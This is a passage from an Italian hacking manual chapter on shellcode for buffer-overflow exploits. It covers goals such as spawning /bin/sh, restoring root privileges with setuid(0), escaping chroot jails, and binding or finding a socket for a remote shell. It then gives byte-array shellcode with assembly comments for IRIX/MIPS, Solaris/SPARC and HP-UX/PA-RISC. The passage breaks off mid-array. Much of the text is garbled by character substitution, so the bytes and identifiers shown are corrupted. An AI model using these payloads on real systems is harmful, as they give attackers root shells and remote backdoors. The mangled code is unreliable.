HackerProgrammingBook Part 18

HackerProgrammingBook Part 18

Published by Flavio Bernardotti

Published by: Flavio Bernardotti on Nov 01, 2012
Copyright:Attribution Non-commercial



Hacker’s Programming Book

Codici assembler per usi legati ai buffers
Fino ad ora abbiamo parlato delle tecniche che avrebbero dovuto permettere di inserire
dentro a dei buffers i codici da fare eseguire tramite la sovrascrittura degli indirizzi di ritorno.
In altre parole all’interno dei vari buffer overflow è necessario inserire dei codici assembler
per cui il problema spesso è quello di non essere in grado di scrivere le varie parti di codice
che chiaramente devono essere specifiche per il processore attaccato.
Mediante le varie routine di analisi è necessario cercare di capire anche l'architettura
interessata, in quanto chiaramente un codice scritto in assembler per un sistema LINUX su
architettura x86 non funzionerà su un processore MIPS.
Qui di seguito vi riporto i codici assembler per vari scopi e varie architetture.
In generale gli scopi sono questi:
Shell Execution: execl(“/bin/sh”, “/bin/sh”, 0);
Shell Single Command Execution: execl(“/bin/sh”, “/bin/sh”, “-c”, cmd, 0);
Privilege Restoration: setuid(0);
seteuid(0);
setreuid(getuid(), 0);
setreuid(0,0);
setresuid(0,0,0);
Chroot Limited Environment Escape: mkdir(“a...”, mode);
chroot(“a..”);
for(I!"#;I--;I$0) chdir(“..”);
chroot(“.”);
Find Socket Code (findsckcode): j=sizeof(sockaddr_in);
for(i!"(;i$0;i--))
if(get*eername(sck,+adr,+%)-,)
continue;
if(-((unsigned
short)+(adr.!/))htons(*ort))
break;
0
for(%!;%$0;%--) du*!(%,i);
Network server code (bindsckcode): sck=socket(AF_INET,SOCK_STREAM,0);
bind(sck,addr,sizeof(addr));
listen(sck,5);
clt=accept(sck,NULL,0);
for(i!;i$0;i--) du*!(i,clt);
Stack pointer retrieval (jump): int sp=(*(int(*)())jump)();
Ad ogni modo la codifica assembler la potete trovare nelle pagine che seguono; i codici sono riassunti
nella seguente tabella.
processor system version p S C P R F B
---------- ----------- ---------------------------------------- -------------
mips irix 5.3 6.2 6.3 6.4 6.5 6.5.10 - x x x x x x
sparc solaris 2.6 2.7 2.8 - x x x x x x
parisc hp-ux 10.20 - x x x x x x
powerpc aix 4.1 4.2 4.3 x x x x x x x
alpha ultrix 5.0 - x x x - - -
x86 solaris 2.6 2.7 2.8 x x x x x x x
x86 beos 5.0 - x x - - - -
x86 linux 6.2 (redhat) - x x x x x x
x86 openbsd 2.8 - x x x x x x
x86 freebsd 3.4 - x x x x x x
x86 netbsd 1.5 - x x x x x x
x86 openserver 5.0.4 x x x x x - -
x86 unixware 7.0 x x x x x x -
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
Dove le lettere specificano:
p - prefix
S - interactive shell
C - single command
P - restore privileges
R - escape chroot jail
F - find socket
B - bind socket
IRIX/MIPS codes, file: mips-irix
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for irix ".B (.! (.B (.C (." (.".,0 mi*s H-/
/-
s>scall J?0 Ja0,Ja,,Ja!,JaB
----------- ---- ---------------------------------------------------------------
exec? xBfB -$*athK/bin/shK,-$.-$a0*ath,0/
exec? xBfB -$*athK/bin/shK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/
getuid xC00
setreuid xC(C ruid,euid0
mkdir xCBD -$*athKa..K,mode (each ?alue is ?alid)
chroot xC!" -$*ath)Ka..K,K.K0
chdir xBfC -$*athK..K
get*eername xCC" sfd,-$sadr./,-$.len(0"0!D#"!/
socket xC"B 12'I345!,6789'65:41;!,*rot0
bind xCC! sfd,-$sadr.0xB0,!,hi,lo,0,0,0,0/,len0x,0
listen xCCD sfd,backlog"
acce*t xCC, sfd,0,0
close xBee fd)0,,,!0
du* xC,, sfd
-/
Hif defined(;I@6) ++ defined(I:IL)
char shellcode./ /- M-CN# b>tes -/
KOx0COx,0OxffOxffK /- blt&al P&ero,Qshellcode$ -/
KOx!COx0!Ox0BOxfBK /- li P?0,,0,, -/
KOx!BOxffOx0,Ox,CK /- addi Pra,Pra,!#( -/
KOx!BOxeCOxffOx0DK /- addi Pa0,Pra,-!CD -/
KOx!BOxe"OxffOx,0K /- addi Pa,,Pra,-!!0 -/
KOxafOxeCOxffOx,0K /- sE Pa0,-!!0(Pra) -/
KOxafOxe0OxffOx,CK /- sE P&ero,-!B((Pra) -/
KOxaBOxe0OxffOx0fK /- sb P&ero,-!C,(Pra) -/
KOx0BOxffOxffOxccK /- s>scall -/
K/bin/shK
;
char cmdshellcode./ /- ,C-CN,!Ncmdlen b>tes -/
KOx0COx,0OxffOxffK /- blt&al P&ero,Qcmdshellcode$ -/
KOx!COx0!Ox0BOxfBK /- li P?0,,0,, -/
KOx!BOxffOx0DOxf0K /- addi Pra,Pra,!!DD -/
KOx!BOxeCOxf#OxC0K /- addi Pa0,Pra,-!!C0 -/
KOx!BOxe"OxfbOx!CK /- addi Pa,,Pra,-,!CC -/
KOxafOxeCOxfbOx!CK /- sE Pa0,-,!CC(Pra) -/
KOx!BOxe(Oxf#OxCDK /- addi Pa!,Pra,-!!B! -/
KOxafOxe(OxfbOx!DK /- sE Pa!,-,!C0(Pra) -/
KOx!BOxe(Oxf#OxCcK /- addi Pa!,Pra,-!!!D -/
KOxafOxe(OxfbOx!cK /- sE Pa!,-,!B((Pra) -/
KOxafOxe0OxfbOxB0K /- sE P&ero,-,!B!(Pra) -/
KOxaBOxe0Oxf#OxC#K /- sb P&ero,-!!BB(Pra) -/
KOxaBOxe0Oxf#OxCaK /- sb P&ero,-!!B0(Pra) -/
KOx0BOxffOxffOxccK /- s>scall -/
K/bin/sh -c K
/- command -/
;
char setreuidcode./ /- #-C b>tes -/
KOx!COx0!Ox0COx0,K /- li P?0,,0!CN, -/
KOx!0OxC!OxffOxffK /- addi P?0,P?0,-, -/
KOx0BOxffOxffOxccK /- s>scall -/
KOxB0OxCCOxffOxffK /- andi Pa0,P?0,0xffff -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxB0Ox0"OxffOxffK /- andi Pa,,P&ero,0xffff -/
KOx!COx0!Ox0COx(CK /- li P?0,,,!C -/
KOx0BOxffOxffOxccK /- s>scall -/
;
char chrootcode./ /- ,D-C b>tes -/
KOxB0Ox(,..K
KOx0COx,0OxffOxffK /- blt&al P&ero,QchrootcodeNC$ -/
KOxafOxe0OxffOxfDK /- sE P&ero,-D(Pra) -/
KOx!BOxeCOxffOxf"K /- addi Pa0,Pra,-,, -/
KOx!COx0!Ox0COxBDK /- li P?0,,0D0 -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!BOxeCOxffOxf"K /- addi Pa0,Pra,-,, -/
KOx!COx0!Ox0COx!"K /- li P?0,,0(, -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!COx,,Ox0,Ox0,K /- li Ps,,!"# -/
KOx!BOxeCOxffOxf(K /- addi Pa0,Pra,-,0 -/
KOx!COx0!Ox0BOxfCK /- li P?0,,0,! -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!OxB,OxffOxffK /- addi Ps,,Ps,,-, -/
KOx0(Ox!,OxffOxfbK /- bge& Ps,,QchrootcodeNC0$ -/
KOx!BOxeCOxffOxf#K /- addi Pa0,Pra,-M -/
KOx!COx0!Ox0COx!"K /- li P?0,,0(, -/
KOx0BOxffOxffOxccK /- s>scall -/
;
char findsckcode./ /- !M-C b>tes -/
KOx0COx,0OxffOxffK /- blt&al P&ero,Qfindsckcode$ -/
KOx!COx,0Ox0,OxM0K /- li Ps0,C00 -/
KOx!!Ox,,Ox0,OxMcK /- addi Ps,,Ps0,C,! -/
KOx!!Ox0dOxfeOxMCK /- addi Pt",Ps0,-(C00-B() -/
KOx0BOxedOx(DOx!0K /- add Pt",Pra,Pt" -/
KOx0,Oxa0Oxf0Ox0MK /- %alr PsD,Pt" -/
KOxM#OxebOxffOxc!K /- lhu PtB,-(!(Pra) -/
KOx!COx0cOx,!OxBCK /- li PtC,0x,!BC -/
KOx0,Ox(cOx"DOx!BK /- subu PtB,PtB,PtC -/
KOx!!Ox0dOxfeOxbcK /- addi Pt",Ps0,-(C00-#() -/
KOx,,Ox(0OxffOxfMK /- beR& PtB,QfindsckcodeN,($ -/
KOx!!Ox!COxfeOxdCK /- addi Pa0,Ps,,-B00 -/
KOx!BOxe"OxffOxc0K /- addi Pa,,Pra,-(C -/
KOx!BOxe(OxffOxfcK /- addi Pa!,Pra,-C -/
KOx!COx0!Ox0COxC"K /- li P?0,,0MB -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!OxB,OxffOxffK /- addi Ps,,Ps,,-, -/
KOx,0Oxe0OxffOxfCK /- beR& PaB,QfindsckcodeN!C$ -/
KOx!!Ox!bOxfeOxdCK /- addi PtB,Ps,,-B00 -/
KOx,dOx(0OxffOxf#K /- bg&t PtB,QfindsckcodeNCC$ -/
KOx!!Ox0COxfeOx#!K /- addi Pa0,Ps0,-BMD -/
KOx!COx0!Ox0BOxeeK /- li P?0,,00( -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox!COxfeOxd"K /- addi Pa0,Ps,,-!MM -/
KOx!COx0!Ox0COx,,K /- li P?0,,0C, -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox,0OxffOxffK /- addi Ps0,Ps0,-, -/
KOx!!Ox0bOxfeOx#!K /- addi PtB,Ps0,-BMD -/
KOx0"Ox(,OxffOxf#K /- bge& PtB,QfindsckcodeND0$ -/
;
char bindsckcode./ /- B,-C b>tes -/
KOxB0Ox0!Ox,!OxBCK
KOx0COx,0OxffOxffK /- blt&al P&ero,QbindsckcodeNC$ -/
KOx!COx,,Ox0,OxffK /- li Ps,,",, -/
KOxafOxe0OxffOxfDK /- sE P&ero,-D(Pra) -/
KOx!!Ox!COxfeOx0BK /- addi Pa0,Ps,,-"0M -/
KOx!!Ox!"OxfeOx0BK /- addi Pa,,Ps,,-"0M -/
KOx!!Ox!(OxfeOx0,K /- addi Pa!,Ps,,-",, -/
KOx!COx0!Ox0COx"BK /- li P?0,,,0# -/
KOx0BOxffOxffOxccK /- s>scall -/
KOxB0OxCCOxffOxffK /- andi Pa0,P?0,0xffff -/
KOx!BOxe"OxffOxfCK /- addi Pa,,Pra,-,! -/
KOx!!Ox!(OxfeOx,,K /- addi Pa!,Ps,,-(",,-,() -/
KOx!COx0!Ox0COxC!K /- li P?0,,0M0 -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox!"OxfeOx0(K /- addi Pa,,Ps,,-"0( -/
KOx!COx0!Ox0COxCDK /- li P?0,,0M( -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox!"OxfeOx0,K /- addi Pa,,Ps,,-",, -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOx!!Ox!(OxfeOx0,K /- addi Pa!,Ps,,-",, -/
KOx!COx0!Ox0COxC,K /- li P?0,,0DM -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx0!Ox!!OxMDOx!0K /- add PsB,Ps,,P?0 -/
KOx!!OxB!OxfeOx0BK /- addi Ps!,Ps,,-"0M -/
KOx0!OxC0Ox!0Ox!"K /- mo?e Pa0,Ps! -/
KOx!COx0!Ox0BOxeeK /- li P?0,,00( -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox(COxfeOx0,K /- addi Pa0,PsB,-",, -/
KOx!COx0!Ox0COx,,K /- li P?0,,0C, -/
KOx0BOxffOxffOxccK /- s>scall -/
KOx!!Ox"!OxffOxffK /- addi Ps!,Ps!,-, -/
KOx0(OxC,OxffOxfDK /- bge& Ps!,QbindsckcodeNM!$ -/
;
char %um*./
KOx0BOxa0Ox,0Ox!"K /- mo?e P?0,Ps* -/
KOx0BOxe0Ox00Ox0DK /- %r Pra -/
;
Hdefine 2I3F689@7:5726 B0
Hdefine AI3F689@7:5726 !
Hendif
Solaris/SPARC codes, file: sparc-solaris
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for solaris !.( !.# !.D s*arc H-/
/-
s>scall Jg, Jo0,Jo,,Jo!,JoB,JoC
----------- ---- ---------------------------------------------------------------
exec x00b -$*athK/bin/kshK,-$.-$a0*ath,0/
exec x00b -$*athK/bin/kshK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/
setuid x0,# uid0
mkdir x0"0 -$*athKb..K,mode (each ?alue is ?alid)
chroot x0Bd -$*ath)Kb..K,K.K0
chdir x00c -$*athK..K
ioctl x0B( sfd,5I'I45@44:31;40x"CM,,-$.mlen0x"C,len0x"C,-$sadr.//
so'socket x0e( 12'I345!,6789'65:41;!,*rot0,de?*ath0,67S'F421<=5,
bind x0eD sfd,-$sadr.0xBB,!,hi,lo,0,0,0,0/,len0x,0,67S'678965:41;!
listen x0eM sfd,backlog",?ers (not reRuired in this s>scall)
acce*t x0ea sfd,0,0,?ers (not reRuired in this s>scall)
fcntl x0Be sfd,2'F<@!2F0x0M,fd)0,,,!0
-/
Hif defined(6@1:8) ++ defined(67=1:I6)
Hifdef 1A7S4'6@1:8SD@=<6
char shellcode./ /- D-CND b>tes -/
KOxMfOxC,OxC0Ox0,K /- rd J*c,Jo# T $ s*arc?DN -/
KOxM0Ox0BOxe0Ox!0K /- add Jo#,B!,Jo0 -/
KOxM!Ox0!Ox!0Ox,0K /- add Jo0,,(,Jo, -/
KOxc0Ox!!Ox!0Ox0DK /- st Jg0,.Jo0ND/ -/
KOxd0Ox!!Ox!0Ox,0K /- st Jo0,.Jo0N,(/ -/
KOxc0Ox!!Ox!0Ox,CK /- st Jg0,.Jo0N!0/ -/
KOxD!Ox,0Ox!0Ox0bK /- mo? 0x0b,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
K/bin/kshK
;
Hendif
char shellcode./ /- ,0-CND b>tes -/
KOx!0OxbfOxffOxffK /- bn,a Qshellcode-C$ -/
KOx!0OxbfOxffOxffK /- bn,a Qshellcode$ -/
KOx#fOxffOxffOxffK /- call QshellcodeNC$ -/
KOxM0Ox0BOxe0Ox!0K /- add Jo#,B!,Jo0 -/
KOxM!Ox0!Ox!0Ox,0K /- add Jo0,,(,Jo, -/
KOxc0Ox!!Ox!0Ox0DK /- st Jg0,.Jo0ND/ -/
KOxd0Ox!!Ox!0Ox,0K /- st Jo0,.Jo0N,(/ -/
KOxc0Ox!!Ox!0Ox,CK /- st Jg0,.Jo0N!0/ -/
KOxD!Ox,0Ox!0Ox0bK /- mo? 0x0b,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
K/bin/kshK
;
char cmdshellcode./ /- ,"-CN,(Ncmdlen b>tes -/
KOx!0OxbfOxffOxffK /- bn,a Qcmdshellcode-C$ -/
KOx!0OxbfOxffOxffK /- bn,a Qcmdshellcode$ -/
KOx#fOxffOxffOxffK /- call QcmdshellcodeNC$ -/
KOxM0Ox0BOxe0OxBCK /- add Jo#,"!,Jo0 -/
KOxM!Ox!BOxe0Ox!0K /- sub Jo#,B!,Jo, -/
KOxa!Ox0!Ox!0Ox0cK /- add Jo0,,!,Jl, -/
KOxaCOx0!Ox!0Ox,0K /- add Jo0,,(,Jl! -/
KOxc0Ox!aOx!0Ox0DK /- stb Jg0,.Jo0ND/ -/
KOxc0Ox!aOx!0Ox0eK /- stb Jg0,.Jo0N,C/ -/
KOxd0Ox!BOxffOxe0K /- st Jo0,.Jo#-B!/ -/
KOxe!Ox!BOxffOxeCK /- st Jl,,.Jo#-!D/ -/
KOxeCOx!BOxffOxeDK /- st Jl!,.Jo#-!C/ -/
KOxc0Ox!BOxffOxecK /- st Jg0,.Jo#-!0/ -/
KOxD!Ox,0Ox!0Ox0bK /- mo? 0x0b,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
K/bin/ksh -c K
/- command -/
;
char setuidcode./ /- B-C b>tes -/
KOxM0Ox0DOx!0Ox0,K /- and Jg0,,,Jo0 -/
KOxD!Ox,0Ox!0Ox,#K /- mo? 0x,#,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
;
char chrootcode./ /- !0-C b>tes -/
KOx!0OxbfOxffOxffK /- bn,a Qchrootcode-C$ -/
KOx!0OxbfOxffOxffK /- bn,a Qchrootcode$ -/
KOx#fOxffOxffOxffK /- call QchrootcodeNC$ -/
KOxD0Ox(,..K
KOxc0Ox!bOxe0Ox0DK /- stb Jg0,.Jo#ND/ -/
KOxM0Ox0BOxe0Ox0"K /- add Jo#,",Jo0 -/
KOxD!Ox,0Ox!0Ox"0K /- mo? 0x"0,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxM0Ox0BOxe0Ox0"K /- add Jo#,",Jo0 -/
KOxD!Ox,0Ox!0OxBdK /- mo? 0xBd,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxaaOx!0OxBfOxe0K /- sub Jg0,-B!,Jl" -/
KOxM0Ox0BOxe0Ox0(K /- add Jo#,(,Jo0 -/
KOxD!Ox,0Ox!0Ox0cK /- mo? 0x0c,Jg, -/
KOxaaOxD"Ox#fOxffK /- addcc Jl",-,,Jl" -/
KOx,!OxbfOxffOxfdK /- ble QchrootcodeNCD$ -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxM0Ox0BOxe0Ox0#K /- add Jo#,#,Jo0 -/
KOxD!Ox,0Ox!0OxBdK /- mo? 0xBd,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
;
char findsckcode./ /- B"-C b>tes -/
KOx!0OxbfOxffOxffK /- bn,a Qfindsckcode-C$ -/
KOx!0OxbfOxffOxffK /- bn,a Qfindsckcode$ -/
KOx#fOxffOxffOxffK /- call QfindsckcodeNC$ -/
KOxBBOx0!Ox,!OxBCK
KOxa0Ox,0Ox!0OxffK /- mo? 0xff,Jl0 -/
KOxa!Ox,0Ox!0Ox"CK /- mo? 0x"C,Jl, -/
KOxaCOx0BOxffOxd0K /- add Jo#,-CD,Jl! -/
KOxaaOx0BOxe0Ox!DK /- add Jo#,C0,Jl" -/
KOxD,Oxc"Ox(0Ox0DK /- %m* Jl"ND -/
KOxc0Ox!bOxe0Ox0CK /- stb Jg0,.Jo#NC/ -/
KOxe(Ox0BOxffOxd0K /- ld .Jo#-CD/,JlB -/
KOxeDOx0BOxe0Ox0CK /- ld .Jo#NC/,JlC -/
KOxaDOxaCOxc0Ox,CK /- subcc JlB,JlC,JlC -/
KOx0!OxbfOxffOxfbK /- b& QfindsckcodeNB!$ -/
KOxaaOx0BOxe0Ox"cK /- add Jo#,M!,Jl" -/
KOxe!Ox!BOxffOxcCK /- st Jl,,.Jo#-(0/ -/
KOxe!Ox!BOxffOxcDK /- st Jl,,.Jo#-"(/ -/
KOxeCOx!BOxffOxccK /- st Jl!,.Jo#-"!/ -/
KOxM0Ox0COx!0Ox0,K /- add Jl0,,,Jo0 -/
KOxa#Ox!cOx(0Ox0DK /- sll Jl,,D,JlB -/
KOxM!Ox,COxe0OxM,K /- or JlB,0xM,,Jo, -/
KOxMCOx0BOxffOxcCK /- add Jo#,-(0,Jo! -/
KOxD!Ox,0Ox!0OxB(K /- mo? 0xB(,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOx,aOxbfOxffOxf,K /- bcc QfindsckcodeNB($ -/
KOxa0OxaCOx!0Ox0,K /- deccc Jl0 -/
KOx,!OxbfOxffOxf"K /- bne QfindsckcodeN(0$ -/
KOxa(Ox,0Ox!0Ox0BK /- mo? 0x0B,JlB -/
KOxM0Ox0COx!0Ox0!K /- add Jl0,!,Jo0 -/
KOxM!Ox,0Ox!0Ox0MK /- mo? 0x0M,Jo, -/
KOxMCOx0COxffOxffK /- add JlB,-,,Jo! -/
KOxD!Ox,0Ox!0OxBeK /- mo? 0xBe,Jg, -/
KOxa(OxDCOxffOxffK /- addcc JlB,-,,JlB -/
KOx,!OxbfOxffOxfbK /- bne QfindsckcodeN,,!$ -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
;
char bindsckcode./ /- BC-C b>tes -/
KOx!0OxbfOxffOxffK /- bn,a Qbindsckcode-C$ -/
KOx!0OxbfOxffOxffK /- bn,a Qbindsckcode$ -/
KOx#fOxffOxffOxffK /- call QbindsckcodeNC$ -/
KOxBBOx0!Ox,!OxBCK
KOxM0Ox,0Ox!0Ox0!K /- mo? 0x0!,Jo0 -/
KOxM!Ox,0Ox!0Ox0!K /- mo? 0x0!,Jo, -/
KOxMCOx0DOx!0Ox0,K /- and Jg0,,,Jo! -/
KOxM(Ox0DOx!0Ox0,K /- and Jg0,,,JoB -/
KOxMDOx,0Ox!0Ox0,K /- mo? 0x0,,JoC -/
KOxD!Ox,0Ox!0Oxe(K /- mo? 0xe(,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxa!Ox!!OxBfOxffK /- sub Jo0,-,,Jl, -/
KOxc0Ox!BOxe0Ox0DK /- st Jg0,.Jo#ND/ -/
KOxM!Ox0BOxe0Ox0CK /- add Jo#,C,Jo, -/
KOxMCOx,0Ox!0Ox,0K /- mo? 0x,0,Jo! -/
KOxM(Ox,0Ox!0Ox0!K /- mo? 0x0!,JoB -/
KOxD!Ox,0Ox!0OxeDK /- mo? 0xeD,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxM0Ox0COx#fOxffK /- add Jl,,-,,Jo0 -/
KOxM!Ox,0Ox!0Ox0"K /- mo? 0x0",Jo, -/
KOxD!Ox,0Ox!0OxeMK /- mo? 0xeM,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxM0Ox0COx#fOxffK /- add Jl,,-,,Jo0 -/
KOxM!Ox0DOx!0Ox0,K /- and Jg0,,,Jo, -/
KOxMCOx0DOx!0Ox0,K /- and Jg0,,,Jo! -/
KOxD!Ox,0Ox!0OxeaK /- mo? 0xea,Jg, -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
KOxa(Ox,0Ox!0Ox0BK /- mo? 0x0B,JlB -/
KOxM!Ox,0Ox!0Ox0MK /- mo? 0x0M,Jo, -/
KOxMCOx0COxffOxffK /- add JlB,-,,Jo! -/
KOxD!Ox,0Ox!0OxBeK /- mo? 0xBe,Jg, -/
KOxa(OxDCOxffOxffK /- addcc JlB,-,,JlB -/
KOx,!OxbfOxffOxfcK /- bne QbindsckcodeN,,!$ -/
KOxM,Oxd0Ox!0Ox0DK /- ta D -/
;
char %um*./
KOxD,OxcBOxe0Ox0DK /- %m* Jo#ND -/
KOxM0Ox,0Ox00Ox0eK /- mo? Js*,Jo0 -/
;
Hdefine 2I3F689@7:5726 ,C
Hdefine AI3F689@7:5726 ,C
Hendif
HP-UX/PA-RISC codes, file: parisc-hpux
/-HH co*>right =165 651I4 72 F4=I:I<; feb !00, *oland -G//lsd-*l.net/ H-/
/-HH asmcodes for h*-ux ,0.!0 *arisc H-/
/-
s>scall Jr!! Jr!(,Jr!",Jr!C,Jr!B
----------- ---- ---------------------------------------------------------------
exec? x00b -$*athK/bin/shK,0
exec? x00b -$*athK/bin/shK,-$.-$a0*ath,-$a,K-cK,-$a!cmd,0/
setresuid x0#e 0,0,0
mkdir x0DD -$*athKa..K,mode (each ?alue is ?alid)
chroot x0Bd -$*ath)Ka..K,K.K0
chdir x00c -$*athK..K
get*eername x,,( sfd,-$sadr./,-$.0x,0/
socket x,!! 12'I345!,6789'65:41;,,*rot0
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
bind x,,C sfd,-$sadr.0x(,,!,hi,lo,0,0,0,0/,len0x,0
listen x,,M sfd,backlog"
acce*t x,,B sfd,0,0
du*! x0"a sfd,fd)0,,,!0
-/
Hif defined(@1:I68) ++ defined(U@<L)
char shellcode./ /- #-CND b>tes -/
KOxebOx"fOx,fOxfdK /- bl QshellcodeNC$,Jr!( -/
KOx0bOxBMOx0!OxMMK /- xor Jr!",Jr!",Jr!" -/
KOxb#Ox"aOxC0Ox!!K /- addi,Q 0x,,,Jr!(,Jr!( -/
KOx0fOxC0Ox,!Ox0eK /- stbs Jr0,#(Jr!() -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOxbCOx,(Ox#0Ox,(K /- addi,$ 0xb,Jr0,Jr!! -/
K/bin/shK
;
char cmdshellcode./ /- ,C-CN,!Ncmdlen b>tes -/
KOxebOx"fOx,fOxfdK /- bl QcmdshellcodeNC$,Jr!( -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxb#Ox"aOxC0Ox"aK /- addi,Q 0x!d,Jr!(,Jr!( -/
KOxb#Ox"(OxC0Ox,0K /- addi,Q 0xD,Jr!(,Jr!! -/
KOxb#Ox""OxC0Ox,DK /- addi,Q 0xc,Jr!(,Jr!, -/
KOx0fOxC0Ox,!Ox0eK /- stbs Jr0,0x#(Jr!() -/
KOx0fOxC0Ox,!Ox,CK /- stbs Jr0,0xa(Jr!() -/
KOx(bOx"aOxBfOxMMK /- stE Jr!(,-0xBC(Jr!() -/
KOx(bOx"(OxBfOxa,K /- stE Jr!!,-0xB0(Jr!() -/
KOx(bOx""OxBfOxaMK /- stE Jr!,,-0x!c(Jr!() -/
KOx(bOxC0OxBfOxb,K /- stE Jr0, -0x!D(Jr!() -/
KOxb#Ox"MOxC#OxMMK /- addi,Q -0xBC,Jr!(,Jr!" -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOxbCOx,(Ox#0Ox,(K /- addi,$ 0x0b,Jr0,Jr!! -/
K/bin/sh -c K
/- command -/
;
char setresuidcode./ /- (-C b>tes -/
KOx0bOx"aOx0!OxMaK /- xor Jr!(,Jr!(,Jr!( -/
KOx0bOxBMOx0!OxMMK /- xor Jr!",Jr!",Jr!" -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOxbCOx,(Ox#0OxfcK /- addi,$ 0x#e,Jr0,Jr!! -/
;
char chrootcode./ /- !C-C b>tes -/
KOxbCOx,#OxC0Ox0CK /- addi,Q 0x!,Jr0,Jr!B -/
KOxebOx"#OxC0Ox0!K /- blr,n Jr!B,Jr!( -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOx0aOxf#Ox0!OxM#K /- xor Jr!B,Jr!B,Jr!B -/
KOxeDOxC0Oxc0Ox0!K /- b?,n 0(Jr*) -/
KOx(,Ox!eOx!eOx!eK /- a... -/
KOxb#Ox"aOxC0Ox,!K /- addi,Q 0xM,Jr!(,Jr!( -/
KOx0DOx,aOx0(Ox0cK /- add Jr!(,Jr0,Jr,! -/
KOx0dOxD0Ox,!Ox0(K /- stbs Jr0,0xB(Jr,!) -/
KOxeDOx"fOx,fOxadK /- bl QchrootcodeNC$,Jr* -/
KOxbCOx,(Ox#,Ox,0K /- addi,$ 0xDD,Jr0,Jr!! -/
KOx0DOx0cOx0(Ox,aK /- add Jr,!,Jr0,Jr!( -/
KOxeDOx"fOx,fOxM"K /- bl QchrootcodeNC$,Jr* -/
KOxbCOx,(Ox#0Ox#aK /- addi,$ 0xBd,Jr0,Jr!! -/
KOxbCOx0dOx0,OxfeK /- addi 0xff,Jr0,Jr,B -/
KOxb"OxMaOxC0Ox0!K /- addi,Q 0x,,Jr,!,Jr!( -/
KOxeDOx"fOx,fOx#"K /- bl QchrootcodeNC$,Jr* -/
KOxbCOx,(Ox#0Ox,DK /- addi,$ 0xc,Jr0,Jr!! -/
KOxDDOx0dOxBfOxddK /- combf, Jr,B,Jr0,QchrootcodeN(C$ -/
KOxb"OxadOx0#OxffK /- addi -0x,,Jr,B,Jr,B -/
KOxb"OxMaOxC0Ox0CK /- addi,Q 0x!,Jr,!,Jr!( -/
KOxeDOx"fOx,fOxCdK /- bl QchrootcodeNC$,Jr* -/
KOxbCOx,(Ox#0Ox#aK /- addi,$ 0xBd,Jr0,Jr!! -/
;
char findsckcode./ /- B0-C b>tes -/
KOxeMOxMfOx,fOxfdK /- bl QfindsckcodeNC$,Jr,! -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
(C) Copyright 2002 Flavio Bernadotti – HackersBook@crackingniversity2000!it
Hacker’s Programming Book
KOxbCOx0eOx0,OxdeK /- addi 0xef,Jr0,Jr,C -/
KOxb"OxMDOx0#OxdBK /- addi -0x,#,Jr,!,Jr!C -/
KOxb"OxMMOx0#OxdbK /- addi -0x,B,Jr,!,Jr!" -/
KOx0DOx0eOx0(Ox,aK /- add Jr,C,Jr0,Jr!( -/
KOx!0Ox!0Ox0DOx0,K /- ldil =J0xc000000C,Jr, -/
KOxeCOx!0Oxe0Ox0DK /- ble :J0xc000000C(Jsr#,Jr,) -/
KOxbCOx,(Ox0!Ox!cK /- addi 0x,,(,Jr0,Jr!! -/
KOxD0Ox,cOx!0Ox!0K /- comb, Jret0,Jr0,QfindsckcodeN(0$ -/
KOx0bOx,DOx0!OxMDK /- xor Jr!C,Jr!C,Jr!C -/
